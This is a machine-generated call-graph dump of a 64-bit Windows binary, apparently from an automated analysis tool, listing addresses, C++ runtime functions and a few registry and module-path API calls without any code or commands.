7ff6f1d937f0 82 API calls 65500->65506 65501 7ff6f1dc051d 65504 7ff6f1d937f0 82 API calls 65501->65504 65774 7ff6f1d9b3d0 82 API calls 2 library calls 65502->65774 65520 7ff6f1dc0692 _Receive_impl 65503->65520 65509 7ff6f1dc0538 65504->65509 65506->65509 65742 7ff6f1d93ff0 65509->65742 65510 7ff6f1dc03c3 65645 7ff6f1da1af0 65510->65645 65511 7ff6f1dc08c8 65516 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65511->65516 65512 7ff6f1dc08ea 65777 7ff6f1d93e90 80 API calls 65512->65777 65519 7ff6f1dc08d8 65516->65519 65517 7ff6f1dc08f7 65522 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65517->65522 65518 7ff6f1dc03e9 65734 7ff6f1d9bd00 65518->65734 65529 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65519->65529 65520->65512 65521 7ff6f1e007d0 __std_exception_destroy 13 API calls 65520->65521 65524 7ff6f1dc0907 65520->65524 65525 7ff6f1dc070a 65521->65525 65522->65524 65528 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65524->65528 65526 7ff6f1e007d0 __std_exception_destroy 13 API calls 65525->65526 65538 7ff6f1dc0718 _Receive_impl 65526->65538 65531 7ff6f1dc090d 65528->65531 65532 7ff6f1dc08de 65529->65532 65530 7ff6f1dc040e 65530->65519 65533 7ff6f1dc0445 _Receive_impl 65530->65533 65535 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65531->65535 65536 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65532->65536 65537 7ff6f1e007d0 __std_exception_destroy 13 API calls 65533->65537 65534->65483 65534->65486 65539 7ff6f1dc0913 65535->65539 65540 7ff6f1dc08e4 65536->65540 65541 7ff6f1dc0479 65537->65541 65538->65531 65538->65534 65543 7ff6f1dc08b0 65538->65543 65544 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65540->65544 65542 7ff6f1e007d0 __std_exception_destroy 13 API calls 65541->65542 65545 7ff6f1dc0487 65542->65545 65546 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65543->65546 65544->65512 65545->65532 65548 7ff6f1dc04be _Receive_impl 65545->65548 65546->65547 65547->65496 65548->65540 65548->65549 65549->65500 65549->65501 65551 7ff6f1dc021c 65550->65551 65554 7ff6f1dc0241 _Receive_impl 65550->65554 65553 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65551->65553 65551->65554 65552 7ff6f1dc0289 _Receive_impl 65552->65414 65553->65554 65554->65552 65555 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65554->65555 65556 7ff6f1dc02b3 65555->65556 65557->65465 65559 7ff6f1de9eec _Getctype 78 API calls 65558->65559 65560 7ff6f1de4955 65559->65560 65561 7ff6f1dec178 _Getctype 78 API calls 65560->65561 65562 7ff6f1dc25cc 65561->65562 65563 7ff6f1dc0a10 65562->65563 65564 7ff6f1dc0a33 65563->65564 65568 7ff6f1dc0a80 65563->65568 65582 7ff6f1dc2180 82 API calls 65564->65582 65567 7ff6f1dc0a38 65567->65568 65583 7ff6f1dc2180 82 API calls 65567->65583 65585 7ff6f1dc0d70 82 API calls 65568->65585 65570 7ff6f1dc0a47 65571 7ff6f1dc0a5d 65570->65571 65584 7ff6f1dc2180 82 API calls 65570->65584 65572 7ff6f1dfe860 _Strcoll 8 API calls 65571->65572 65575 7ff6f1dc0a7a 65572->65575 65573 7ff6f1dfe860 _Strcoll 8 API calls 65576 7ff6f1dc0cb5 65573->65576 65575->65473 65576->65473 65577 7ff6f1dc0a56 65577->65568 65577->65571 65578 7ff6f1dc0bb7 65578->65573 65579 7ff6f1dc2180 82 API calls 65581 7ff6f1dc0ac1 65579->65581 65581->65578 65581->65579 65586 7ff6f1dc0d70 82 API calls 65581->65586 65582->65567 65583->65570 65584->65577 65585->65581 65586->65581 65587->65481 65588->65485 65592 7ff6f1d9b7ce 65589->65592 65590 7ff6f1d93d70 82 API calls 65595 7ff6f1d9b912 65590->65595 65591 7ff6f1d9b81e 65594 7ff6f1d93d70 82 API calls 65591->65594 65592->65591 65593 7ff6f1d98560 82 API calls 65592->65593 65612 7ff6f1d9b8ac _Receive_impl 65592->65612 65593->65591 65596 7ff6f1d9b838 65594->65596 65597 7ff6f1d9b91e 65595->65597 65598 7ff6f1d9bad1 65595->65598 65600 7ff6f1d93d70 82 API calls 65596->65600 65599 7ff6f1d9bd00 84 API calls 65597->65599 65606 7ff6f1d9bb2d 65598->65606 65607 7ff6f1d98560 82 API calls 65598->65607 65602 7ff6f1d9b92b 65599->65602 65601 7ff6f1d9b852 65600->65601 65603 7ff6f1d9b85f 65601->65603 65778 7ff6f1d98d10 82 API calls 5 library calls 65601->65778 65605 7ff6f1d9b987 65602->65605 65610 7ff6f1d98560 82 API calls 65602->65610 65609 7ff6f1d93d70 82 API calls 65603->65609 65613 7ff6f1d93d70 82 API calls 65605->65613 65608 7ff6f1d93d70 82 API calls 65606->65608 65607->65606 65611 7ff6f1d9bb47 65608->65611 65609->65612 65610->65605 65617 7ff6f1d93d70 82 API calls 65611->65617 65612->65590 65615 7ff6f1d9bcdf 65612->65615 65614 7ff6f1d9b9a6 65613->65614 65616 7ff6f1d93d70 82 API calls 65614->65616 65620 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65615->65620 65618 7ff6f1d9b9bc 65616->65618 65619 7ff6f1d9bb66 65617->65619 65623 7ff6f1d93d70 82 API calls 65618->65623 65621 7ff6f1d93d70 82 API calls 65619->65621 65622 7ff6f1d9bce5 65620->65622 65634 7ff6f1d9ba30 _Receive_impl 65621->65634 65625 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65622->65625 65624 7ff6f1d9b9d6 65623->65624 65626 7ff6f1d9b9e3 65624->65626 65779 7ff6f1d98d10 82 API calls 5 library calls 65624->65779 65627 7ff6f1d9bceb 65625->65627 65632 7ff6f1d93d70 82 API calls 65626->65632 65630 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65627->65630 65629 7ff6f1d9bcf1 65631 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65629->65631 65630->65629 65633 7ff6f1d9bcf7 65631->65633 65632->65634 65634->65622 65634->65627 65634->65629 65634->65634 65635 7ff6f1d9bc2d 65634->65635 65636 7ff6f1d98560 82 API calls 65634->65636 65642 7ff6f1d9bcb1 _Receive_impl 65634->65642 65637 7ff6f1d93d70 82 API calls 65635->65637 65636->65635 65638 7ff6f1d9bc47 65637->65638 65638->65638 65639 7ff6f1d93d70 82 API calls 65638->65639 65640 7ff6f1d9bc5f 65639->65640 65641 7ff6f1d93d70 82 API calls 65640->65641 65643 7ff6f1d9bc79 65641->65643 65642->65510 65643->65642 65644 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65643->65644 65644->65615 65646 7ff6f1da1b4f 65645->65646 65780 7ff6f1d7ef10 82 API calls 3 library calls 65646->65780 65648 7ff6f1da1b66 65649 7ff6f1d7ebf0 82 API calls 65648->65649 65650 7ff6f1da1ba2 65649->65650 65781 7ff6f1da04d0 82 API calls 65650->65781 65652 7ff6f1da1bc1 _Receive_impl 65654 7ff6f1da1dee 65652->65654 65655 7ff6f1e00740 __std_exception_copy 80 API calls 65652->65655 65658 7ff6f1da1df4 65652->65658 65661 7ff6f1da1dfa 65652->65661 65668 7ff6f1da1de8 65652->65668 65653 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65653->65654 65656 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65654->65656 65657 7ff6f1da1d53 65655->65657 65656->65658 65660 7ff6f1da1da7 _Receive_impl 65657->65660 65664 7ff6f1da1de3 65657->65664 65659 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65658->65659 65659->65661 65663 7ff6f1dfe860 _Strcoll 8 API calls 65660->65663 65662 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65661->65662 65669 7ff6f1da1e00 65662->65669 65665 7ff6f1da1dcc 65663->65665 65667 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65664->65667 65665->65518 65666 7ff6f1da1e8d 65667->65668 65668->65653 65669->65666 65670 7ff6f1d9b780 84 API calls 65669->65670 65671 7ff6f1da2a9c 65670->65671 65672 7ff6f1da1af0 84 API calls 65671->65672 65673 7ff6f1da2ac2 65672->65673 65674 7ff6f1d9bd00 84 API calls 65673->65674 65675 7ff6f1da2ad2 65674->65675 65676 7ff6f1da2b3d 65675->65676 65677 7ff6f1da2add 65675->65677 65792 7ff6f1d93e90 80 API calls 65676->65792 65678 7ff6f1d92880 78 API calls 65677->65678 65681 7ff6f1da2ae7 65678->65681 65680 7ff6f1da2b49 65682 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65680->65682 65782 7ff6f1d7eec0 65681->65782 65684 7ff6f1da2b59 65682->65684 65793 7ff6f1d93e90 80 API calls 65684->65793 65687 7ff6f1d92880 78 API calls 65689 7ff6f1da2afb 65687->65689 65688 7ff6f1da2b66 65690 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65688->65690 65693 7ff6f1d92880 78 API calls 65689->65693 65691 7ff6f1da2b76 65690->65691 65794 7ff6f1d93e90 80 API calls 65691->65794 65695 7ff6f1da2b06 65693->65695 65694 7ff6f1da2b83 65696 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65694->65696 65787 7ff6f1d9c4d0 65695->65787 65697 7ff6f1da2b93 65696->65697 65795 7ff6f1da4430 80 API calls 65697->65795 65700 7ff6f1da2b14 65702 7ff6f1dfe860 _Strcoll 8 API calls 65700->65702 65701 7ff6f1da2ba0 65703 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65701->65703 65704 7ff6f1da2b26 65702->65704 65705 7ff6f1da2bb0 65703->65705 65704->65518 65796 7ff6f1d93e90 80 API calls 65705->65796 65707 7ff6f1da2bbd 65708 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65707->65708 65709 7ff6f1da2bcd 65708->65709 65797 7ff6f1d93e90 80 API calls 65709->65797 65711 7ff6f1da2bda 65712 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65711->65712 65713 7ff6f1da2bea 65712->65713 65798 7ff6f1d93e90 80 API calls 65713->65798 65715 7ff6f1da2bf7 65716 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65715->65716 65717 7ff6f1da2c07 65716->65717 65799 7ff6f1d93e90 80 API calls 65717->65799 65719 7ff6f1da2c14 65720 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65719->65720 65721 7ff6f1da2c24 65720->65721 65800 7ff6f1d93e90 80 API calls 65721->65800 65723 7ff6f1da2c31 65724 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65723->65724 65725 7ff6f1da2c41 65724->65725 65801 7ff6f1d93e90 80 API calls 65725->65801 65727 7ff6f1da2c4e 65728 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65727->65728 65729 7ff6f1da2c5e 65728->65729 65802 7ff6f1d93e90 80 API calls 65729->65802 65731 7ff6f1da2c6b 65732 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65731->65732 65733 7ff6f1da2c7b 65732->65733 65735 7ff6f1d9be02 65734->65735 65740 7ff6f1d9bd56 65734->65740 65736 7ff6f1dfe860 _Strcoll 8 API calls 65735->65736 65737 7ff6f1d9be12 65736->65737 65737->65498 65737->65530 65740->65735 65741 7ff6f1d93d70 82 API calls 65740->65741 65803 7ff6f1d7b5b0 80 API calls 65740->65803 65804 7ff6f1d98d10 82 API calls 5 library calls 65740->65804 65741->65740 65743 7ff6f1d9402d 65742->65743 65744 7ff6f1d94350 65743->65744 65745 7ff6f1d94066 65743->65745 65746 7ff6f1d94107 65743->65746 65765 7ff6f1d943c2 _Receive_impl 65743->65765 65750 7ff6f1d94373 65744->65750 65751 7ff6f1d9443a 65744->65751 65744->65765 65748 7ff6f1d940a6 65745->65748 65768 7ff6f1d94482 65745->65768 65810 7ff6f1d992c0 82 API calls 3 library calls 65745->65810 65760 7ff6f1d94134 65746->65760 65746->65768 65812 7ff6f1d992c0 82 API calls 3 library calls 65746->65812 65747 7ff6f1dfe860 _Strcoll 8 API calls 65749 7ff6f1d9445f 65747->65749 65773 7ff6f1d94102 _Receive_impl 65748->65773 65811 7ff6f1da0610 82 API calls 3 library calls 65748->65811 65749->65502 65753 7ff6f1d9442b 65750->65753 65763 7ff6f1d9437c 65750->65763 65805 7ff6f1d900f0 65751->65805 65752 7ff6f1d94347 65825 7ff6f1d94ca0 82 API calls 2 library calls 65752->65825 65826 7ff6f1d94ca0 82 API calls 2 library calls 65753->65826 65760->65773 65813 7ff6f1da0610 82 API calls 3 library calls 65760->65813 65763->65765 65766 7ff6f1d9447d 65763->65766 65765->65747 65767 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65766->65767 65767->65768 65827 7ff6f1d90640 82 API calls 65768->65827 65770 7ff6f1d91a20 82 API calls 65770->65773 65771 7ff6f1da0610 82 API calls 65771->65773 65773->65752 65773->65770 65773->65771 65814 7ff6f1d99380 65773->65814 65819 7ff6f1da9810 65773->65819 65774->65489 65775->65477 65776->65511 65777->65517 65778->65603 65779->65626 65780->65648 65781->65652 65783 7ff6f1e007d0 __std_exception_destroy 13 API calls 65782->65783 65784 7ff6f1d7eeee 65783->65784 65785 7ff6f1e007d0 __std_exception_destroy 13 API calls 65784->65785 65786 7ff6f1d7eefb 65785->65786 65786->65687 65788 7ff6f1d9c4e6 65787->65788 65789 7ff6f1d9c50f _Receive_impl 65787->65789 65788->65789 65790 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65788->65790 65789->65700 65791 7ff6f1d9c52f 65790->65791 65792->65680 65793->65688 65794->65694 65795->65701 65796->65707 65797->65711 65798->65715 65799->65719 65800->65723 65801->65727 65802->65731 65803->65740 65804->65740 65806 7ff6f1d90141 65805->65806 65809 7ff6f1d9010f _Receive_impl 65805->65809 65807 7ff6f1d99380 82 API calls 65807->65809 65808 7ff6f1da9810 82 API calls 65808->65809 65809->65806 65809->65807 65809->65808 65811->65748 65813->65760 65815 7ff6f1d993d1 65814->65815 65816 7ff6f1d9939c _Receive_impl 65814->65816 65815->65773 65816->65815 65817 7ff6f1d99380 82 API calls 65816->65817 65818 7ff6f1da9810 82 API calls 65816->65818 65817->65816 65818->65816 65828 7ff6f1d91a20 65819->65828 65822 7ff6f1da9856 _Receive_impl 65822->65773 65823 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65824 7ff6f1da987c 65823->65824 65825->65744 65826->65765 65829 7ff6f1d93ff0 82 API calls 65828->65829 65830 7ff6f1d91a38 65829->65830 65830->65822 65830->65823 65832 7ff6f1d97d66 65831->65832 65833 7ff6f1d97e73 65832->65833 65834 7ff6f1d97dac 65832->65834 65840 7ff6f1d97e1f 65832->65840 65843 7ff6f1d7b9e0 82 API calls 65833->65843 65836 7ff6f1dfe888 std::_Facet_Register 82 API calls 65834->65836 65838 7ff6f1d97dca 65836->65838 65839 7ff6f1d937f0 82 API calls 65838->65839 65839->65840 65840->65421 65841->65416 65842->65425 65844->65434 65845->65450 65846 7ff6f1da23c4 65849 7ff6f1d9c600 65846->65849 65848 7ff6f1da23d4 65850 7ff6f1d9c623 65849->65850 65855 7ff6f1d9c670 65849->65855 65852 7ff6f1d9e200 82 API calls 65850->65852 65851 7ff6f1d9e200 82 API calls 65851->65855 65853 7ff6f1d9c628 65852->65853 65854 7ff6f1d9e200 82 API calls 65853->65854 65853->65855 65856 7ff6f1d9c637 65854->65856 65855->65851 65866 7ff6f1d9c6c3 65855->65866 65857 7ff6f1d9c64d 65856->65857 65858 7ff6f1d9e200 82 API calls 65856->65858 65859 7ff6f1dfe860 _Strcoll 8 API calls 65857->65859 65860 7ff6f1d9c646 65858->65860 65861 7ff6f1d9c66a 65859->65861 65860->65855 65860->65857 65861->65848 65862 7ff6f1d9c7c8 65863 7ff6f1dfe860 _Strcoll 8 API calls 65862->65863 65864 7ff6f1d9c91b 65863->65864 65864->65848 65865 7ff6f1d9e200 82 API calls 65865->65866 65866->65862 65866->65865 65867 7ff6f1d94965 65868 7ff6f1dfe888 std::_Facet_Register 82 API calls 65867->65868 65869 7ff6f1d94977 65868->65869 65874 7ff6f1d929b0 65869->65874 65871 7ff6f1d94991 65872 7ff6f1dfe860 _Strcoll 8 API calls 65871->65872 65873 7ff6f1d94a73 65872->65873 65875 7ff6f1d929de 65874->65875 65877 7ff6f1d92a2a 65875->65877 65879 7ff6f1d929fa memcpy_s 65875->65879 65880 7ff6f1d92a82 65875->65880 65887 7ff6f1d92abd 65875->65887 65881 7ff6f1dfe888 std::_Facet_Register 82 API calls 65877->65881 65882 7ff6f1d92ab7 65877->65882 65879->65871 65883 7ff6f1dfe888 std::_Facet_Register 82 API calls 65880->65883 65884 7ff6f1d92a40 65881->65884 65888 7ff6f1d7b820 82 API calls 2 library calls 65882->65888 65883->65879 65884->65879 65886 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65884->65886 65886->65882 65889 7ff6f1d7b8e0 82 API calls 65887->65889 65888->65887 65890 7ff6f1dd6e1b RegOpenKeyExA 65891 7ff6f1dd6e45 RegQueryValueExA 65890->65891 65899 7ff6f1dd6ebd _Receive_impl 65890->65899 65895 7ff6f1dd6e84 65891->65895 65891->65899 65893 7ff6f1dd6f14 RegCloseKey 65894 7ff6f1dd6f1a 65893->65894 65896 7ff6f1dfe860 _Strcoll 8 API calls 65894->65896 65900 7ff6f1d928e0 78 API calls 2 library calls 65895->65900 65897 7ff6f1dd6f2d 65896->65897 65899->65893 65899->65894 65900->65899 65901 7ff6f1ddcb57 65902 7ff6f1ddcb61 65901->65902 65907 7ff6f1ddd050 65902->65907 65905 7ff6f1dfe860 _Strcoll 8 API calls 65906 7ff6f1ddceb3 65905->65906 65911 7ff6f1ddd08f 65907->65911 65914 7ff6f1ddcb70 65907->65914 65908 7ff6f1ddd308 65928 7ff6f1d7b900 8 API calls _Strcoll 65908->65928 65911->65908 65916 7ff6f1ddd28d 65911->65916 65926 7ff6f1d93d70 82 API calls 65911->65926 65927 7ff6f1d7b5b0 80 API calls 65911->65927 65912 7ff6f1ddd329 65929 7ff6f1dde760 82 API calls 65912->65929 65914->65905 65915 7ff6f1ddd33f 65917 7ff6f1d97ac0 82 API calls 65915->65917 65916->65914 65930 7ff6f1dde840 82 API calls 65916->65930 65918 7ff6f1ddd352 65917->65918 65920 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65918->65920 65920->65916 65921 7ff6f1ddd38a 65922 7ff6f1d97ac0 82 API calls 65921->65922 65923 7ff6f1ddd39d 65922->65923 65924 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65923->65924 65925 7ff6f1ddd3ae 65924->65925 65926->65911 65927->65911 65928->65912 65929->65915 65930->65921 65931 7ff6f1dba41b 65932 7ff6f1dba433 65931->65932 65933 7ff6f1dba468 _Receive_impl 65931->65933 65932->65933 65935 7ff6f1dba8d0 65932->65935 65934 7ff6f1dba4c1 _Receive_impl 65933->65934 65938 7ff6f1dba8d5 65933->65938 65936 7ff6f1dba515 _Receive_impl 65934->65936 65941 7ff6f1dba8db 65934->65941 65937 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65935->65937 65939 7ff6f1dfe860 _Strcoll 8 API calls 65936->65939 65937->65938 65940 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65938->65940 65942 7ff6f1dba543 65939->65942 65940->65941 65943 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65941->65943 65944 7ff6f1dba8e1 65943->65944 66001 7ff6f1dd0040 65944->66001 65946 7ff6f1dba93f memcpy_s 65947 7ff6f1dba97e GetModuleFileNameW 65946->65947 65948 7ff6f1dba9c0 65947->65948 65948->65948 65949 7ff6f1d86940 82 API calls 65948->65949 65950 7ff6f1dba9dd 65949->65950 65951 7ff6f1d86940 82 API calls 65950->65951 65952 7ff6f1dbabfe 65951->65952 66075 7ff6f1d86bd0 65952->66075 65954 7ff6f1dbac0c 66089 7ff6f1d95fd0 85 API calls 65954->66089 65956 7ff6f1dbac26 65957 7ff6f1d86940 82 API calls 65956->65957 65958 7ff6f1dbae9d 65957->65958 65959 7ff6f1d86bd0 82 API calls 65958->65959 65960 7ff6f1dbaeab 65959->65960 66090 7ff6f1d95fd0 85 API calls 65960->66090 65962 7ff6f1dbaec6 65963 7ff6f1d86940 82 API calls 65962->65963 65964 7ff6f1dbb13e 65963->65964 66091 7ff6f1d7d4a0 82 API calls 65964->66091 65966 7ff6f1dbb15a 66092 7ff6f1d95fd0 85 API calls 65966->66092 65968 7ff6f1dbb16f 65969 7ff6f1d86940 82 API calls 65968->65969 65970 7ff6f1dbb61d 65969->65970 65971 7ff6f1d86bd0 82 API calls 65970->65971 65972 7ff6f1dbb62e 65971->65972 66093 7ff6f1d95fd0 85 API calls 65972->66093 65974 7ff6f1dbb64c 65975 7ff6f1d86940 82 API calls 65974->65975 65976 7ff6f1dbb8dd 65975->65976 65977 7ff6f1d86bd0 82 API calls 65976->65977 65978 7ff6f1dbb8ee 65977->65978 66094 7ff6f1d95fd0 85 API calls 65978->66094 65980 7ff6f1dbb90c 65981 7ff6f1d86940 82 API calls 65980->65981 65982 7ff6f1dbbb90 65981->65982 65983 7ff6f1d86bd0 82 API calls 65982->65983 65984 7ff6f1dbbba1 65983->65984 66095 7ff6f1d95fd0 85 API calls 65984->66095 65986 7ff6f1dbbbbf 65987 7ff6f1d86940 82 API calls 65986->65987 65988 7ff6f1dbbdaa 65987->65988 65989 7ff6f1d86bd0 82 API calls 65988->65989 65990 7ff6f1dbbdbb 65989->65990 66096 7ff6f1d95fd0 85 API calls 65990->66096 65992 7ff6f1dbbdd9 65993 7ff6f1d86940 82 API calls 65992->65993 65994 7ff6f1dbc0ef 65993->65994 65995 7ff6f1d86bd0 82 API calls 65994->65995 65996 7ff6f1dbc100 65995->65996 66097 7ff6f1d95fd0 85 API calls 65996->66097 65998 7ff6f1dbc11e 66098 7ff6f1d7cf70 65998->66098 66002 7ff6f1dd00d3 66001->66002 66102 7ff6f1d7d810 66002->66102 66004 7ff6f1dd00f8 _Receive_impl 66005 7ff6f1d7eaf0 97 API calls 66004->66005 66020 7ff6f1dd064c 66004->66020 66006 7ff6f1dd0164 memcpy_s 66005->66006 66007 7ff6f1dd01a6 66006->66007 66013 7ff6f1d9a910 148 API calls 66006->66013 66009 7ff6f1dd0652 66007->66009 66011 7ff6f1dd0207 _Receive_impl 66007->66011 66014 7ff6f1dd0647 66007->66014 66008 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66008->66009 66152 7ff6f1d7e240 87 API calls Concurrency::cancel_current_task 66009->66152 66012 7ff6f1dfe860 _Strcoll 8 API calls 66011->66012 66015 7ff6f1dd0239 66012->66015 66016 7ff6f1dd0289 66013->66016 66017 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66014->66017 66015->65946 66019 7ff6f1dd051e 66016->66019 66111 7ff6f1d956a0 66016->66111 66017->66020 66019->66011 66151 7ff6f1d912f0 82 API calls 66019->66151 66020->66008 66079 7ff6f1d86bfe 66075->66079 66076 7ff6f1d86cf3 66368 7ff6f1d7b8e0 82 API calls 66076->66368 66079->66076 66080 7ff6f1d86ced 66079->66080 66082 7ff6f1d86c1a memcpy_s 66079->66082 66083 7ff6f1d86c8d 66079->66083 66084 7ff6f1d86cb4 66079->66084 66367 7ff6f1d7b820 82 API calls 2 library calls 66080->66367 66082->65954 66083->66080 66086 7ff6f1dfe888 std::_Facet_Register 82 API calls 66083->66086 66085 7ff6f1dfe888 std::_Facet_Register 82 API calls 66084->66085 66085->66082 66087 7ff6f1d86c9e 66086->66087 66087->66082 66088 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66087->66088 66088->66080 66089->65956 66090->65962 66091->65966 66092->65968 66093->65974 66094->65980 66095->65986 66096->65992 66097->65998 66099 7ff6f1d7cf8d 66098->66099 66100 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66099->66100 66101 7ff6f1d7cf9e 66100->66101 66103 7ff6f1d7d850 66102->66103 66104 7ff6f1d7d97a 66103->66104 66109 7ff6f1d7d896 66103->66109 66105 7ff6f1d86bd0 82 API calls 66104->66105 66106 7ff6f1d7d982 66105->66106 66157 7ff6f1d7d140 66106->66157 66108 7ff6f1d7d8fa memcpy_s 66108->66004 66109->66108 66156 7ff6f1d9ec90 82 API calls 5 library calls 66109->66156 66112 7ff6f1d937f0 82 API calls 66111->66112 66113 7ff6f1d956d6 66112->66113 66175 7ff6f1d9ee00 66113->66175 66117 7ff6f1d95745 66261 7ff6f1d99450 66117->66261 66151->66007 66156->66108 66162 7ff6f1d7d15f 66157->66162 66158 7ff6f1d7d297 66160 7ff6f1d7d35e 66158->66160 66165 7ff6f1d7d2a7 66158->66165 66159 7ff6f1d7d26b 66159->66158 66161 7ff6f1d7d2c0 66159->66161 66174 7ff6f1d945e0 82 API calls 66160->66174 66161->66165 66172 7ff6f1d97fd0 82 API calls 5 library calls 66161->66172 66162->66159 66169 7ff6f1d7d24a 66162->66169 66173 7ff6f1d925d0 82 API calls memcpy_s 66165->66173 66166 7ff6f1d7d255 66166->66108 66171 7ff6f1d7d9c0 82 API calls memcpy_s 66169->66171 66171->66166 66172->66165 66173->66166 66176 7ff6f1d9ee54 66175->66176 66177 7ff6f1de494c 78 API calls 66176->66177 66178 7ff6f1d9ef3a 66177->66178 66179 7ff6f1d9c600 82 API calls 66178->66179 66180 7ff6f1d9ef61 66179->66180 66271 7ff6f1d7f1f0 66180->66271 66183 7ff6f1dfe860 _Strcoll 8 API calls 66184 7ff6f1d95739 66183->66184 66185 7ff6f1d99f80 66184->66185 66186 7ff6f1d9a291 66185->66186 66190 7ff6f1d99fcb memcpy_s 66185->66190 66279 7ff6f1da1e10 66186->66279 66189 7ff6f1d9c600 82 API calls 66196 7ff6f1d9a2d0 66189->66196 66346 7ff6f1d9b5b0 82 API calls 66190->66346 66192 7ff6f1d9a01b 66347 7ff6f1da0c20 84 API calls 2 library calls 66192->66347 66194 7ff6f1d9a02b 66198 7ff6f1d9c600 82 API calls 66194->66198 66195 7ff6f1d937f0 82 API calls 66199 7ff6f1d9a48c 66195->66199 66200 7ff6f1d9b780 84 API calls 66196->66200 66248 7ff6f1d9a457 _Receive_impl 66196->66248 66197 7ff6f1d9a28c _Receive_impl 66201 7ff6f1dfe860 _Strcoll 8 API calls 66197->66201 66213 7ff6f1d9a037 66198->66213 66202 7ff6f1d93ff0 82 API calls 66199->66202 66203 7ff6f1d9a31d 66200->66203 66204 7ff6f1d9a51c 66201->66204 66209 7ff6f1d9a4c6 66202->66209 66206 7ff6f1da1af0 84 API calls 66203->66206 66204->66117 66205 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66210 7ff6f1d9a57b 66205->66210 66211 7ff6f1d9a343 66206->66211 66207 7ff6f1d9a225 66215 7ff6f1d937f0 82 API calls 66207->66215 66231 7ff6f1d9a27f 66207->66231 66208 7ff6f1d9a1dd 66212 7ff6f1d937f0 82 API calls 66208->66212 66209->66197 66258 7ff6f1d9a575 66209->66258 66349 7ff6f1d93e90 80 API calls 66210->66349 66214 7ff6f1d9bd00 84 API calls 66211->66214 66219 7ff6f1d9a1f8 66212->66219 66216 7ff6f1d9b780 84 API calls 66213->66216 66260 7ff6f1d9a1c4 _Receive_impl 66213->66260 66227 7ff6f1d9a352 _Receive_impl 66214->66227 66215->66219 66220 7ff6f1d9a083 66216->66220 66225 7ff6f1d93ff0 82 API calls 66219->66225 66224 7ff6f1da1af0 84 API calls 66220->66224 66221 7ff6f1d9a588 66226 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66221->66226 66222 7ff6f1d9a5aa 66350 7ff6f1d93e90 80 API calls 66222->66350 66230 7ff6f1d9a0a9 66224->66230 66225->66231 66232 7ff6f1d9a598 66226->66232 66227->66222 66228 7ff6f1e007d0 __std_exception_destroy 13 API calls 66227->66228 66233 7ff6f1d9a5c7 66227->66233 66234 7ff6f1d9a3ca 66228->66234 66229 7ff6f1d9a5b7 66235 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66229->66235 66236 7ff6f1d9bd00 84 API calls 66230->66236 66348 7ff6f1d9b3d0 82 API calls 2 library calls 66231->66348 66237 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66232->66237 66240 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66233->66240 66238 7ff6f1e007d0 __std_exception_destroy 13 API calls 66234->66238 66235->66233 66239 7ff6f1d9a0b9 66236->66239 66241 7ff6f1d9a59e 66237->66241 66252 7ff6f1d9a3d8 _Receive_impl 66238->66252 66239->66210 66242 7ff6f1d9a0ce 66239->66242 66243 7ff6f1d9a5cd 66240->66243 66246 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66241->66246 66242->66232 66244 7ff6f1d9a105 _Receive_impl 66242->66244 66245 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66243->66245 66247 7ff6f1e007d0 __std_exception_destroy 13 API calls 66244->66247 66249 7ff6f1d9a5d3 66245->66249 66250 7ff6f1d9a5a4 66246->66250 66251 7ff6f1d9a139 66247->66251 66248->66195 66248->66209 66249->66117 66256 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66250->66256 66253 7ff6f1e007d0 